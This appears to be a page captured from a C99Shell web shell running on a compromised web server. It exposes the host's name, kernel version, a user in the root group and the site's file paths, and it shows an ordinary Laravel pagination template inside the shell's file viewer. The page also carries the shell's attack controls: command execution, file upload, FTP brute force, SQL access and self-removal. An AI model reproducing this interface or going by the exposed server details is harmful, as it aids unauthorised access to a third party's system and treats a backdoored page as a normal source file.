!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/classify.picotech.app/public_html/resources/views/vendor/pagination/   drwxr-xr-x
Free 29 GB of 117.98 GB (24.58%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     bootstrap-4.blade.php (3.03 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@if ($paginator->hasPages())
    <nav>
        <ul class="pagination">
            {{-- Previous Page Link --}}
            @if ($paginator->onFirstPage())
                <li class="page-item page-navigation__item page-navigation__next">
                    <a class="page-link page-navigation__link" aria-label="Previous">
                        <span aria-hidden="true">
                            <x-svg.left-arrow-icon stroke="currentColor" />
                        </span>
                    </a>
                </li>
            @else
                <li class="page-item page-navigation__item page-navigation__prev">
                    <a class="page-link page-navigation__link" href="{{ $paginator->previousPageUrl() }}"
                        aria-label="Previous">
                        <span aria-hidden="true">
                            <x-svg.left-arrow-icon stroke="currentColor" />
                        </span>
                    </a>
                </li>
            @endif

            {{-- Pagination Elements --}}
            @foreach ($elements as $element)
                {{-- "Three Dots" Separator --}}
                @if (is_string($element))
                    <li class="page-item page-navigation__item"><a
                            class="page-link page-navigation__link">{{ $element }}</a></li>
                @endif

                {{-- Array Of Links --}}
                @if (is_array($element))
                    @foreach ($element as $page => $url)
                        @if ($page == $paginator->currentPage())
                            <li class="page-item page-navigation__item"><a
                                    class="page-link page-navigation__link active bg-primary">{{ $page }}</a></li>
                        @else
                            <li class="page-item page-navigation__item"><a href="{{ $url }}"
                                    class="page-link page-navigation__link">{{ $page }}</a></li>
                        @endif
                    @endforeach
                @endif
            @endforeach

            {{-- Next Page Link --}}
            @if ($paginator->hasMorePages())
                <li class="page-item page-navigation__item page-navigation__next">
                    <a class="page-link page-navigation__link" href="{{ $paginator->nextPageUrl() }}" aria-label="Next">
                        <span aria-hidden="true">
                            <x-svg.right-arrow-icon stroke="currentColor" />
                        </span>
                    </a>
                </li>
            @else
                <li class="page-item page-navigation__item page-navigation__prev">
                    <a class="page-link page-navigation__link" aria-label="Next">
                        <span aria-hidden="true">
                            <x-svg.right-arrow-icon stroke="currentColor" />
                        </span>
                    </a>
                </li>
            @endif
        </ul>
    </nav>
@endif

<style>
    .page-link {
        display: inline !important;
    }
</style>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0042 ]--